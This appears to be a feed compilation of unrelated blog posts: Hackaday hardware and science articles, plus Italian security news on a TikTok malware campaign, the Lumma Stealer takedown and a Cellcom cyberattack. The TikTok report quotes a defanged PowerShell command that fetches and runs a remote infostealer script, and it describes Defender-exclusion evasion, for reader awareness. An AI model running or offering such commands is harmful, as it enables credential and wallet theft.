Hackaday Supercon 2025 Call For Participation: We Want You!
We’re tremendously excited to be able to announce that the Hackaday Supercon is on for 2025, and will be taking place October 31st through November 2nd in Pasadena, California.
Supercon is about bringing the Hackaday community together to share our great ideas, big and small. So get to brainstorming, because we’d like to hear what you’ve been up to! Like last year, we’ll be featuring both longer and shorter talks, and hope to get a great mix of both first-time presenters and Hackaday luminaries. If you know someone you think should give a talk, point them here.
The Call for Participation form is online now, and you’ve got until July 3rd to get yourself signed up.
Honestly, just the people that Supercon brings together is reason enough to attend, but then you throw in the talks, the badge-hacking, the food, and the miscellaneous shenanigans … it’s an event you really don’t want to miss. And as always, presenters get in for free, get their moment in the sun, and get warm vibes from the Hackaday audience. Get yourself signed up now!
We’ll have more news forthcoming in the next few weeks, including the start of ticket sales, so be sure to keep your eyes on Hackaday.
Now KDE Users Will Get Easy Virtual Machine Management, Too
If you work with virtual machines, perhaps to spin up a clean OS install for testing, historically you have either bitten the bullet and used one of the commercial options, or spent time getting your hands dirty with something open source. Over recent years that has changed, with the arrival of open source graphical applications for effortless VM usage. We’ve used GNOME Boxes here to make our lives a lot easier. Now KDE are also joining the party with Karton, a project which will deliver what looks very similar to Boxes in the KDE desktop.
The news comes in a post from Derek Lin, and shows us what work has already been done as well as a roadmap for future work. At the moment it’s in no way production ready and it only works with QEMU, but it can generate new VMs, run them, and capture their screens to a desktop window. Having no wish to join in any Linux desktop holy wars we look forward to seeing this piece of software progress, as it’s a Google Summer Of Code project we hope there will be plenty more to see shortly.
Still using the commercial option? You can move to open source too!
A Brief History of Fuel Cells
If we asked you to think of a device that converts a chemical reaction into electricity, you’d probably say we were thinking of a battery. That’s true, but there is another device that does this that is both very similar and very different from a battery: the fuel cell.
In a very simple way, you can think of a fuel cell as a battery that consumes the chemicals it uses and allows you to replace those chemicals so that, as long as you have fuel, you can have electricity. However, the truth is a little more complicated than that. Batteries are energy storage devices. They run out when the energy stored in the chemicals runs out. In fact, many batteries can take electricity and reverse the chemical reaction, in effect recharging them. Fuel cells react chemicals to produce electricity. No fuel, no electricity.
Superficially, the two devices seem very similar. Like batteries, fuel cells have an anode and a cathode. They also have an electrolyte, but its purpose isn’t the same as in a conventional battery. Typically, a catalyst causes fuel to oxidize, creating positively charged ions and electrons. These ions move from the anode to the cathode, and the electrons move from the anode, through an external circuit, and then to the cathode, so electric current occurs. As a byproduct, many fuel cells produce potentially useful byproducts like water. NASA has the animation below that shows how one type of cell works.
youtube.com/embed/V3ChCroWttY?…
History
Sir William Grove seems to have made the first fuel cell in 1838, publishing in The London and Edinburgh Philosophical Magazine and Journal of Science. His fuel cell used dilute acid, copper sulphate, along with sheet metal and porcelain. Today, the phosphoric acid fuel cell is similar to Grove’s design.
The Bacon fuel cell is due to Francis Thomas Bacon and uses alkaline fuel. Modern versions of this are in use today by NASA and others. Although Bacon’s fuel cell could produce 5 kW, it was General Electric in 1955 that started creating larger units. GE chemists developed an ion exchange membrane that included a platinum catalyst. Named after the developers, the “Grubb-Niedrach” fuel cell flew in Gemini space capsules. By 1959, a fuel cell tractor prototype was running, as well as a welding machine powered by a Bacon cell.
One of the reasons spacecraft often use fuel cells is that many cells take hydrogen and oxygen as fuel and put out electricity and water. There are already gas tanks available, and you can always use water.
Types of Fuel Cells
Not all fuel cells use the same fuel or produce the same byproducts. At the anode, a catalyst ionizes the fuel, which produces a positive ion and a free electron. The electrolyte, often a membrane, can pass ions, but not the electrons. That way, the ions move towards the cathode, but the electrons have to find another way — through the load — to get to the cathode. When they meet again, a reaction with more fuel and a catalyst produces the byproduct: hydrogen and oxygen form water.
Most common cells use hydrogen and oxygen with an anode catalyst of platinum and a cathode catalyst of nickel. The voltage output per cell is often less than a volt. However, some fuel cells use hydrocarbons. Diesel, methanol, and other hydrocarbons can produce electricity and carbon dioxide as a byproduct, along with water. You can even use some unusual organic inputs, although to be fair, those are microbial fuel cells.
Common types include:
- Alkaline – The Bacon cell was a fixture in space capsules, using carbon electrodes, a catalyst, and a hydroxide electrolyte.
- Solid acid – These use a solid acid material as electrolyte. The material is heated to increase conductivity.
- Phosphoric acid – Another acid-based technology that operates at hotter temperatures.
- Molten carbonate – These work at high temperatures using lithium potassium carbonate as an electrolyte.
- Solid oxide – Another high temperature that uses zirconia ceramic as the electrolyte.
In addition to technology, you can consider some fuel cells as stationary — typically producing a lot of power for consumption by some power grid — or mobile.
Using fuel cells in stationary applications is attractive partly because they have no moving parts. However, you need a way to fuel it and — if you want efficiency — you need a way to harness the waste heat produced. It is possible, for example, to use solar power to turn water into gas and then use that gas to feed a fuel cell. It is possible to use the heat directly or to convert it to electricity in a more conventional way.
Space
Fuel cells have a long history in space. You can see how alkaline Bacon cells were used in early fuel cells in the video below.
youtube.com/embed/OouXKyroV4w?…Apollo (left) and Shuttle (right) fuel cells (from a NASA briefing)
Very early fuel cells — starting with Gemini in 1962 — used a proton exchange membrane. However, in 1967, NASA started using Nafion from DuPont, which was improved over the old membranes.
However, alkaline cells had vastly improved power density, and from Apollo on, these cells, using a potassium hydroxide electrolyte, were standard issue.
Even the Shuttle had fuel cells. Russian spacecraft also had fuel cells, starting with a liquid oxygen-hydrogen cell used on the Soviet Lunar Orbital Spacecraft (LOK).
The shuttle’s power plant measured 14 x 15 x 45 inches and weighed 260 pounds. They were installed under the payload bay, just aft of the crew compartment. They drew cryogenic gases from nearby tanks and could provide 12 kW continuously, and up to 16 kW. However, they typically were taxed at about 50% capacity. Each orbiter’s power plant contained 96 individual cells connected to achieve a 28-volt output.
Going Mobile
There have been attempts to make fuel cell cars, but with the difficulty of delivering, storing, and transporting hydrogen, there has been resistance. The Toyota Mirai, for example, costs $57,000, yet owners sued because they couldn’t obtain hydrogen. Some buses use fuel cells, and a small number of trains (including the one mentioned in the video below).
youtube.com/embed/0d0h42IZlWU?…
Surprisingly, there is a market for forklifts using fuel cells. The clean output makes them ideal for indoor operation. Batteries? They take longer to charge and don’t work well in the cold. Fuel cells don’t mind the cold, and you can top them off in three minutes.
There have been attempts to put fuel cells into any vehicle you can imagine. Airplanes, motorcycles, and boats sporting fuel cells have all made the rounds.
Can You DIY?
We have seen a few fuel cell projects, but they all seem to vanish over time. In theory, it shouldn’t be that hard, unless you demand commercial efficiency. However, it can be done, as you can see in the video below. If you make a fuel cell, be sure to send us a tip so we can spread the word.
youtube.com/embed/NE6dxzDeWbI?…
Featured image: “SEM micrograph of an MEA cross section” by [Xi Yin]
Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware!
In un preoccupante segnale dell’evoluzione delle tattiche cybercriminali, i threat actor stanno ora sfruttando la popolarità di TikTok come canale per la distribuzione di malware avanzati progettati per il furto di informazioni. L’ultima campagna in circolazione si concentra sulla diffusione degli infostealer Vidar e StealC, inducendo gli utenti a eseguire comandi PowerShell dannosi con il pretesto di attivare software legittimi o sbloccare funzionalità premium in applicazioni come Windows OS, Microsoft Office, CapCut e Spotify.
A differenza dei metodi tradizionali — come i siti web compromessi o le email di phishing — questo vettore d’attacco si basa esclusivamente su tecniche di ingegneria sociale veicolate tramite video. I criminali informatici realizzano video anonimi, spesso generati con strumenti di intelligenza artificiale, che guidano passo dopo passo le vittime nell’installazione inconsapevole del malware sui propri dispositivi.
Questo approccio è particolarmente insidioso perché non lascia alcun codice dannoso sulla piattaforma stessa che le soluzioni di sicurezza possano rilevare e tutti i contenuti fruibili vengono forniti in modo visivo e uditivo. I ricercatori di Trend Micro hanno identificato diversi account TikTok coinvolti in questa campagna, tra cui @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc e @digitaldreams771.
La loro indagine ha rivelato che alcuni video hanno ottenuto un notevole successo: uno in particolare ha ottenuto oltre 20.000 “Mi piace”, 100 commenti e ha raggiunto circa 500.000 visualizzazioni. Questa ampia diffusione dimostra il potenziale impatto della campagna e sottolinea come la portata algoritmica di TikTok possa amplificare contenuti dannosi.
Le conseguenze per le vittime sono gravi, poiché questi ladri di informazioni possono sottrarre dati sensibili, rubare credenziali e potenzialmente compromettere i sistemi aziendali. Una volta installato, il malware stabilisce una comunicazione con i server di comando e controllo, consentendo agli aggressori di raccogliere informazioni preziose dai dispositivi compromessi.
Meccanismo di infezione e analisi tecnica
La catena di infezione inizia quando gli utenti seguono le istruzioni video per aprire PowerShell (premendo Windows+R e digitando “powershell”) e quindi eseguono un comando simile a: iex (irm https://allaivo[.]me/spotify). Questo comando dall’aspetto innocuo scarica ed esegue uno script remoto (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) che avvia il processo di infezione.
Una volta eseguito, lo script crea delle directory nascoste nelle cartelle APPDATA e LOCALAPPDATA dell’utente, quindi aggiunge questi percorsi all’elenco di esclusione di Windows Defender: una sofisticata tecnica di elusione che aiuta il malware a evitare il rilevamento. Il malware procede quindi a scaricare ulteriori payload, tra cui i ladri di informazioni Vidar e StealC.
Queste varianti di malware sono particolarmente pericolose perché prendono di mira informazioni sensibili, tra cui password salvate, portafogli di criptovalute e cookie di autenticazione. Dopo l’installazione, il malware si connette a vari server di comando e controllo, tra cui servizi legittimi utilizzati in modo improprio.
Vidar, ad esempio, utilizza i profili Steam (hxxps://steamcommunity[.]com/profiles/76561199846773220) e i canali Telegram (hxxps://t[.]me/v00rd) come “Dead Drop Resolver” per nascondere la sua effettiva infrastruttura C&C, una tecnica che rende il tracciamento e l’interruzione più difficili. Ciò che rende questa campagna particolarmente efficace è il modo in cui fonde l’ingegneria sociale con lo sfruttamento tecnico.
Presentandosi come utili tutorial per accedere alle funzionalità premium dei software più diffusi, i video creano fiducia negli spettatori, che poi eseguono volentieri i comandi che compromettono i loro sistemi. Ciò rappresenta un’evoluzione significativa negli attacchi basati sui social media, dimostrando come gli autori delle minacce continuino ad adattare le proprie tattiche per sfruttare il comportamento degli utenti ed eludere i controlli di sicurezza tradizionali.
L'articolo Hai seguito un bel tutorial su TikTok e non sei stato attento? Bravo, ti sei beccato un malware! proviene da il blog della sicurezza informatica.
Trashed Sound System Lives to Rock another Day
Plenty of consumer goods, from passenger vehicles to toys to electronics, get tossed out prematurely for all kinds of reasons. Repairable damage, market trends, planned obsolescence, and bad design can all lead to an early sunset on something that might still have some useful life in it. This was certainly the case for a sound system that [Bill] found — despite a set of good speakers, the poor design of the hardware combined with some damage was enough for the owner to toss it. But [Bill] took up the challenge to get it back in working order again.Inside the DIY control unit.
The main problem with this unit is that of design. It relies on a remote control to turn it on and operate everything, and if that breaks or is lost, the entire unit won’t even power on. Tracing the remote back to the control board reveals a 15-pin connector, and some other audio sleuths online have a few ways of using this port to control the system without the remote.
[Bill] found a few mistakes that needed to be corrected, and was eventually able to get an ESP8266 (and eventually an ESP32) to control the unit thanks largely to the fact that it communicates using a slightly modified I2C protocol.
There were a few pieces of physical damage to correct, too. First, the AC power cable had been cut off which was simple enough to replace, but [Bill] also found that a power connector inside the unit was loose as well. With that taken care of he has a perfectly functional and remarkably inexpensive sound system ready for movies or music. There are some other options available for getting a set of speakers blasting tunes again as well, like building the amplifier for them from scratch from the get-go.
Roller Gearbox Allows For New Angles in Robotics
DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.
Multiple rollers rest on a simple shaft allowing each roller to have independent rotation. This is important because having a circular crown gear for angled transmission creates different rotation speeds. In [Sergei]’s testing, he found that his example gearbox could withstand 9 Nm with the actual adapter breaking before the gearbox showing decent strength.
Of course, how does this differ from a normal bevel gear setup or other 3D printed gearboxes? While 3D printed gears have great flexibility in their simplicity to make, having plastic on plastic is generally very difficult to get precise and long lasting. [Sergei]’s design allows for a highly complex crown gear to take advantage of 3D printing while allowing for simple rollers for improved strength and precision.
While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential in helping make some cool projects. Unique gearboxes are somewhat common here at Hackaday such as this wobbly pericyclic gearbox, but they almost always have a fun spin!
youtube.com/embed/VXcuryyRGbo?…
Thanks to [M] for the tip!
Lumma Stealer: inizio del takedown o solo una mossa tattica?
Nelle ultime ore si è assistito a un grande clamore mediatico riguardante il “takedown” dell’infrastruttura del noto malware-as-a-service Lumma Stealer, con un’operazione congiunta guidata dall’FBI, Europol, CISA e partner privati come Microsoft. L’azione ha colpito i sistemi di distribuzione e i canali di affitto del malware, mirando a interrompere una delle minacce cybercriminali più attive degli ultimi anni.
Tuttavia, come emerge anche dall’articolo di BleepingComputer e da verifiche indipendenti, è importante distinguere tra il successo tattico dell’operazione e l’effettiva capacità di neutralizzare l’infrastruttura di Lumma Stealer.
Secondo le dichiarazioni ufficiali, sono stati sequestrati oltre 2.300 domini legati a Lumma e chiuse alcune piattaforme di vendita e affitto del malware. Microsoft ha ottenuto un’ordinanza per disabilitare infrastrutture gestite attraverso registrar fraudolenti. Tuttavia, l’analisi tecnica suggerisce che il malware è ancora operativo in parte della sua rete.
Test condotti su campioni attivi mostrano che Lumma è ancora in grado di comunicare con server C2 non colpiti. Alcuni operatori underground hanno confermato disservizi temporanei risolti in tempi brevi. Questo dimostra che, pur rappresentando un’importante azione di disturbo, l’operazione non ha colpito in modo definitivo la catena operativa del malware.
Un pannello ancora attivo vs uno sequestrato
La sfida delle infrastrutture flessibili
Lumma, come altri infostealer, è progettato per essere resiliente. Le sue componenti infrastrutturali vengono ruotate frequentemente, i C2 vengono cambiati ogni giorno, e i panel di controllo sono distribuiti e replicabili. Questo rende difficile per le autorità infliggere un danno permanente solo attraverso il sequestro di domini. L’infrastruttura può riorganizzarsi rapidamente, grazie a backup e domini dormienti pronti all’attivazione.
Pressione anche sugli affiliati
Un elemento interessante è il presunto sequestro del canale Telegram ufficiale di Lumma, o quantomeno la sua compromissione da parte delle autorità. Dopo una prima comunicazione in lingua russa, è comparso un secondo messaggio in inglese attribuito direttamente al Federal Bureau of Investigation, rafforzato da un’immagine simbolica che mostra un uccello dietro le sbarre.
Il messaggio, rivolto agli abbonati del servizio, ringrazia ironicamente i membri del team Lumma per l'”ospitalità” concessa nel canale, accusando al contempo gli amministratori di non aver protetto i propri clienti.
Viene inoltre offerta la possibilità di contattare direttamente l’FBI tramite Telegram, Signal o email, in un apparente invito alla collaborazione o alla resa volontaria. La comunicazione chiude con una frase dal tono volutamente ambiguo: “se non ci contattate voi, non preoccupatevi: lo faremo noi”.
Questa manovra, se autentica, va oltre il semplice sequestro tecnico: rappresenta una forma di pressione psicologica mirata a erodere la fiducia degli utenti finali nel servizio stesso, scoraggiando future attività e instaurando un clima di panico o diffidenza all’interno dell’ecosistema criminale.
Il ruolo strategico degli attori privati
Uno degli aspetti più significativi di questa operazione è il coinvolgimento diretto di aziende private nella fase di intelligence, sequestro e disabilitazione tecnica dell’infrastruttura di Lumma Stealer. Microsoft ha avuto un ruolo centrale nell’ottenere un’ordinanza per il sequestro di domini gestiti da registrar fraudolenti.
ESET ha partecipato con attività di monitoraggio e analisi proattiva delle componenti malware, fornendo informazioni fondamentali sulle modalità di funzionamento di Lumma e supportando l’attribuzione degli elementi infrastrutturali. CleanDNS ha collaborato al blocco e alla de-registrazione dei domini malevoli, mentre Cloudflare ha contribuito con dati e strumenti di threat intelligence volti a contrastare le tecniche di evasione utilizzate da Lumma per mascherare il proprio traffico C2.
Questa sinergia tra pubblico e privato ha rappresentato una leva fondamentale per portare avanti un’operazione coordinata su scala globale, dimostrando come l’efficacia di una cyber-operazione oggi dipenda sempre più dalla collaborazione trasversale tra attori istituzionali e industria della sicurezza.
Gli infostealer superano i ransomware?
Questa operazione, sebbene non definitiva, rappresenta un’importante inversione di tendenza: si comincia a colpire sistematicamente un fenomeno in fortissima espansione. Gli stealer come Lumma stanno diventando il vero motore economico del cybercrime moderno.
La vendita massiva di log, credenziali, cookie e wallet esfiltrati avviene in modo automatico su marketplace underground e Telegram, generando profitti costanti, anche in assenza di estorsione diretta.
Il takedown parziale di Lumma Stealer rappresenta un risultato concreto, ma non ancora risolutivo. L’infrastruttura ha subito un colpo, ma non è stata smantellata del tutto. Il malware continua a circolare, anche se con meno efficienza.
È quindi fondamentale osservare le prossime mosse delle autorità: solo la continuità operativa e un cambio di passo strategico potranno incidere in modo duraturo su una minaccia che si è già evoluta oltre i confini del modello ransomware.
Fonti:
- bleepingcomputer.com/news/secu…
- cisa.gov/news-events/cybersecu…
- app.any.run/tasks/fb014a66-d52…
- welivesecurity.com/en/eset-res…
- cleandns.com/battling-lumma-st…
- bitsight.com/blog/lumma-steale…
- cloudflare.com/it-it/threat-in…
- Osservazioni e discussioni pubblicate su X da analisti di sicurezza indipendenti (maggio 2025)
L'articolo Lumma Stealer: inizio del takedown o solo una mossa tattica? proviene da il blog della sicurezza informatica.
Jettison Sails for Electric Propulsion
Although there are some ferries and commercial boats that use a multi-hull design, the most recognizable catamarans by far are those used for sailing. They have a number of advantages over monohull boats including higher stability, shallower draft, more deck space, and often less drag. Of course, these advantages aren’t exclusive to sailboats, and plenty of motorized recreational craft are starting to take advantage of this style as well. It’s also fairly straightforward to remove the sails and add powered locomotion as well, as this electric catamaran demonstrates.
Not only is this catamaran electric, but it’s solar powered as well. With the mast removed, the solar panels can be fitted to a canopy which provides 600 watts of power as well as shade to both passengers. The solar panels charge two 12V 100ah LifePo4 batteries and run a pair of motors. That’s another benefit of using a sailing cat as an electric boat platform: the rudders can be removed and a pair of motors installed without any additional drilling in the hulls, and the boat can be steered with differential thrust, although this boat also makes allowances for pointing the motors in different directions as well.
In addition to a highly polished electric drivetrain, the former sailboat adds some creature comforts as well, replacing the trampoline with a pair of seats and adding an electric hoist to raise and lower the canopy. As energy density goes up and costs come down for solar panels, more and more watercraft are taking advantage of this style of propulsion as well. In the past we’ve seen solar kayaks, solar houseboats, and custom-built catamarans (instead of conversions) as well.
youtube.com/embed/1DyONG2oHPg?…
Wisconsin e Michigan senza telefono: Cellcom è stata attaccata. Niente chiamate per una settimana
Gli abbonati dell’operatore di telecomunicazioni Cellcom, che serve gli utenti del Wisconsin e dell’Upper Michigan (USA), sono rimasti senza comunicazione per quasi una settimana: non potevano né chiamare né inviare SMS. Solo pochi giorni dopo l’inizio dell’incidente l’azienda ha ammesso ciò che era già stato sospettato: un attacco informatico aveva causato i massicci disagi.
Inizialmente, l’operatore ha definito l’incidente un malfunzionamento tecnico, assicurando che la trasmissione dati, iMessage, i messaggi RCS e le chiamate di emergenza al 911 hanno continuato a funzionare. Tuttavia, gli utenti esprimevano sempre più insoddisfazione per la mancanza di comunicazione e l’impossibilità di trasferire un numero a un altro operatore: i sistemi interni di Cellcom semplicemente non funzionavano.
Ora l’amministratore delegato dell’azienda, Brigid Riordan, ha confermato ufficialmente che si tratta di un “incidente informatico”.
In una lettera agli abbonati, ha sottolineato che l’azienda aveva messo in atto dei protocolli di risposta e che il team aveva seguito tali piani fin dall’inizio. Le misure adottate includono l’intervento di esperti esterni in sicurezza informatica, la notifica all’FBI e alle autorità del Wisconsin e il lavoro 24 ore su 24 per ripristinare i sistemi.
L’attacco ha colpito solo un segmento separato dell’infrastruttura, non correlato all’archiviazione dei dati personali. Finora non ci sono state prove di fughe di informazioni, compresi nomi, indirizzi e dati finanziari degli abbonati.
Al momento alcuni servizi vengono gradualmente ripristinati. Il 19 maggio gli utenti hanno potuto scambiarsi SMS ed effettuare chiamate all’interno della rete Cellcom. Tuttavia, i tempi necessari per una completa ripresa restano incerti. Nella sua pagina degli aggiornamenti, la società ha affermato che prevede di ripristinare tutti i servizi entro la fine della settimana, ma non è riuscita a fornire una data esatta.
Per gli abbonati il cui ripristino della connessione è in ritardo, viene offerto un modo semplice per provare a ripristinare il servizio: attivare la modalità aereo per 10 secondi, quindi disattivarla. Se il problema persiste, riavviare il dispositivo.
Nonostante le crescenti critiche per la lenta risposta, Cellcom ha iniziato a essere più aperta sulla situazione: oltre alla lettera, l’amministratore delegato ha anche registrato un videomessaggio in cui spiega la situazione attuale e i progressi della ripresa. L’azienda non ha rilasciato dichiarazioni in merito al possibile attacco ransomware.
La situazione attuale dimostra quanto possa diventare critica la dipendenza dalla stabilità delle infrastrutture digitali, anche a livello regionale. Allo stesso tempo, Cellcom sottolinea di essersi preparata in anticipo a simili incidenti, ma che le conseguenze sono state comunque avvertite da decine di migliaia di utenti.
L'articolo Wisconsin e Michigan senza telefono: Cellcom è stata attaccata. Niente chiamate per una settimana proviene da il blog della sicurezza informatica.
Gene Editing Spiders to Produce Red Fluorescent Silk
Regular vs gene-edited spider silk with a fluorescent gene added. (Credit: Santiago-Rivera et al. 2025, Angewandte Chemie)
Continuing the scientific theme of adding fluorescent proteins to everything that moves, this time spiders found themselves at the pointy end of the CRISPR-Cas9 injection needle. In a study by researchers at the University of Bayreuth, common house spiders (Parasteatoda tepidariorum) had a gene inserted for a red fluorescent protein in addition to having an existing gene for eye development disabled. This was the first time that spiders have been subjected to this kind of gene-editing study, mostly due to how fiddly they are to handle as well as their genome duplication characteristics.
In the research paper in Angewandte Chemie the methods and results are detailed, with the knock-out approach of the sine oculis (C1) gene being tried first as a proof of concept. The CRISPR solution was injected into the ovaries of female spiders, whose offspring then carried the mutation. With clear deficiencies in eye development observable in this offspring, the researchers moved on to adding the red fluorescent protein gene with another CRISPR solution, which targets the major ampullate gland where the silk is produced.
Ultimately, this research serves to demonstrate that it is possible to not only study spiders in more depth these days using tools like CRISPR-Cas9, but also that it is possible to customize and study spider silk production.
High Voltage for Extreme Ozone
Don’t you hate it when making your DIY X-ray machine you make an uncomfortable amount of ozone gas? No? Well [Hyperspace Pirate] did, which made him come up with an interesting idea. While creating a high voltage supply for his very own X-ray machine, the high voltage corona discharge produced a very large amount of ozone. However, normally ozone is produced using lower voltage, smaller gaps, and large surface areas. Naturally, this led [Hyperspace Pirate] to investigate if a higher voltage method is effective at producing ozone.
Using a custom 150kV converter, [Hyperspace Pirate] was able to test the large gap method compared to the lower voltage method (dielectric barrier discharge). An ammonia reaction with the ozone allowed our space buccaneer to test which method was able to produce more ozone, as well as some variations of the designs.
Experimental Setup with ozone production in the left jar and nitrate in the right.
Large 150kV gaps proved slightly effective but with no large gains, at least not compared to the dielectric barrier method. Of which, glass as the dielectric leads straight to holes, and HTPE gets cooked, but in the end, he was able to produce a somewhat sizable amount of ammonium nitrate. The best design included two test tubes filled with baking soda and their respective electrodes. Of course, this comes with the addition of a very effective ozone generator.
While this project is very thorough, [Hyperspace Pirate] himself admits the extreme dangers of high ozone levels, even getting close enough to LD50 levels for worry throughout out his room. This goes for when playing with high voltage in general kids! At the end of the day even with potential asthma risk, this is a pretty neat project that should probably be left to [Hyperspace Pirate]. If you want to check out other projects from a distance you should look over to this 20kW microwave to cook even the most rushed meals!
youtube.com/embed/HZYWpZYuRKc?…
Thanks to [Mahdi Naghavi] for the Tip!
FLOSS Weekly Episode 833: Up and Over
This week, Jonathan Bennett and Jeff Massie chat with Tom Herbert about eBPF, really fast networking, what the future looks like for high performance computing and the Linux Kernel, and more!
youtube.com/embed/v9P5em2r0fo?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/05/21/floss-…
Field Testing An Antenna, Using A Field
The ARRL used to have a requirement that any antenna advertised in their publications had to have real-world measurements accompanying it, to back up any claims of extravagant performance. I’m told that nowadays they will accept computer simulations instead, but it remains true that knowing what your antenna does rather than just thinking you know what it does gives you an advantage. I was reminded of this by a recent write-up in which the performance of a mylar sheet as a ground plane was tested at full power with a field strength meter, because about a decade ago I set out to characterise an antenna using real-world measurements and readily available equipment. I was in a sense field testing it, so of course the first step of the process was to find a field. A real one, with cows.
Walking Round And Round A Field In The Name Of Science
A very low-tech way to make field recordings.
The process I was intending to follow was simple enough. Set up the antenna in the middle of the field, have it transmit some RF, and measure the signal strength at points along a series of radial lines away from it I’d end up with a spreadsheet, from which I could make a radial plot that would I hoped, give me a diagram showing its performance. It’s a rough and ready methodology, but given a field and a sunny afternoon, not one that should be too difficult.
I was more interested in the process than the antenna, so I picked up my trusty HB9CV two-element 144MHz antenna that I’ve stood and pointed at the ISS many times to catch SSTV transmissions. It’s made from two phased half-wave radiators, but it can be seen as something similar to a two-element Yagi array. I ran a long mains lead oput to a plastic garden table with the HB9CV attached, and set up a Raspberry Pi whose clock would produce the RF.
My receiver would be an Android tablet with an RTL-SDR receiver. That’s pretty sensitive for this purpose, so my transmitter would have to be extremely low powered. Ideally I would want no significant RF to make it beyond the boundary of the field, so I gave the Pi a resistive attenuator network designed to give an output of around 0.03 mW, or 30 μW. A quick bit of code to send my callsign as CW periodically to satisfy my licence conditions, and I was off with the tablet and a pen and paper. Walking round the field in a polar grid wasn’t as easy as it might seem, but I had a very long tape measure to help me.
A Lot Of Work To Tell Me What I Already Knew
And lo! for I have proven an HB9CV to be directional!
I ended up with a page of figures, and then a spreadsheet which I’m amused to still find in the depths of my project folder. It contains a table of angles of incidence to the antenna versus metres from the antenna, and the data points are the figure in (uncalibrated) mV that the SDR gave me for the carrier at that point. The resulting polar plot shows the performace of the antenna at each angle, and unsurprisingly I proved to myself that a HB9CV is indeed a directional antenna.
My experiment was in itself not of much use other than to prove to myself I could characterise an antenna with extremely basic equipment. But then again it’s possible that in times past this might have been a much more difficult task, so knowing I can do it at all is an interesting conclusion.
A New Mac Plus Motherboard, No Special Chips Required
The Macintosh Plus was Apple’s third version on the all-in-one Mac, and for its time it was a veritable powerhouse. If you don’t have one here in 2025 there are a variety of ways to emulate it, but should you wish for something closer to the silicon there’s now [max1zzz]’s all-new Mac Plus motherboard in a mini-ITX form factor to look forward to.
As with other retrocomputing communities, the classic Mac world has seen quite a few projects replacing custom parts with modern equivalents. Thus it has reverse engineered Apple PALs, a replacement for the Sony sound chip, an ATtiny based take on the Mac real-time clock, and a Pi Pico that does VGA conversion. It’s all surface mount save for the connectors and the 68000, purely because a socketed processor allows for one of the gold-and-ceramic packages to be used. The memory is soldered, but with 4 megabytes, this is well-specced for a Mac Plus.
At the moment it’s still in the prototype spin phase, but plenty of work is being done and it shows meaningful progress towards an eventual release to the world. We are impressed, and look forward to the modern takes on a Mac Plus which will inevitably come from it. While you’re waiting, amuse yourself with a lower-spec take on an early Mac.
Thanks [DosFox] for the tip.
Big Chemistry: Fuel Ethanol
If legend is to be believed, three disparate social forces in early 20th-century America – the temperance movement, the rise of car culture, and the Scots-Irish culture of the South – collided with unexpected results. The temperance movement managed to get Prohibition written into the Constitution, which rankled the rebellious spirit of the descendants of the Scots-Irish who settled the South. In response, some of them took to the backwoods with stills and sacks of corn, creating moonshine by the barrel for personal use and profit. And to avoid the consequences of this, they used their mechanical ingenuity to modify their Fords, Chevrolets, and Dodges to provide the speed needed to outrun the law.
Though that story may be somewhat apocryphal, at least one of those threads is still woven into the American story. The moonshiner’s hotrod morphed into NASCAR, one of the nation’s most-watched spectator sports, and informed much of the car culture of the 20th century in general. Unfortunately, that led in part to our current fossil fuel predicament and its attendant environmental consequences, which are now being addressed by replacing at least some of the gasoline we burn with the same “white lightning” those old moonshiners made. The cost-benefit analysis of ethanol as a fuel is open to debate, as is the wisdom of using food for motor fuel, but one thing’s for sure: turning corn into ethanol in industrially useful quantities isn’t easy, and it requires some Big Chemistry to get it done.
Heavy on the Starch
As with fossil fuels, manufacturing ethanol for motor fuel starts with a steady supply of an appropriate feedstock. But unlike the drilling rigs and pump jacks that pull the geochemically modified remains of half-billion-year-old phytoplankton from deep within the Earth, ethanol’s feedstock is almost entirely harvested from the vast swathes of corn that carpet the Midwest US (Other grains and even non-grain plants are used as feedstock in other parts of the world, but we’re going to stick with corn for this discussion. Also, other parts of the world refer to any grain crop as corn, but in this case, corn refers specifically to maize.)Don’t try to eat it — you’ll break your teeth. Yellow dent corn is harvested when full of starch and hard as a rock. Credit: Marjhan Ramboyong.
The corn used for ethanol production is not the same as the corn-on-the-cob at a summer barbecue or that comes in plastic bags of frozen Niblets. Those products use sweet corn bred specifically to pack extra simple sugars and less starch into their kernels, which is harvested while the corn plant is still alive and the kernels are still tender. Field corn, on the other hand, is bred to produce as much starch as possible, and is left in the field until the stalks are dead and the kernels have converted almost all of their sugar into starch. This leaves the kernels dry and hard as a rock, and often with a dimple in their top face that gives them their other name, dent corn.
Each kernel of corn is a fruit, at least botanically, with all the genetic information needed to create a new corn plant. That’s carried in the germ of the kernel, a relatively small part of the kernel that contains the embryo, a bit of oil, and some enzymes. The bulk of the kernel is taken up by the endosperm, the energy reserve used by the embryo to germinate, and as a food source until photosynthesis kicks in. That energy reserve is mainly composed of starch, which will power the fermentation process to come.
Starch is mainly composed of two different but related polysaccharides, amylose and amylopectin. Both are polymers of the simple six-carbon sugar glucose, but with slightly different arrangements. Amylose is composed of long, straight chains of glucose molecules bound together in what’s called an α-1,4 glycosidic bond, which just means that the hydroxyl group on the first carbon of the first glucose is bound to the hydroxyl on the fourth carbon of the second glucose through an oxygen atom:Amylose, one of the main polysaccharides in starch. The glucose subunits are connected in long, unbranched chains up to 500 or so residues long. The oxygen atom binding each glucose together comes from a reaction between the OH radicals on the 1 and 4 carbons, with one oxygen and two hydrogens leaving in the form of water.
Amylose chains can be up to about 500 or so glucose subunits long. Amylopectin, on the other hand, has shorter straight chains but also branches formed between the number one and number six carbon, an α-1,6 glycosidic bond. The branches appear about every 25 residues or so, making amylopectin much more tangled and complex than amylose. Amylopectin makes up about 75% of the starch in a kernel.
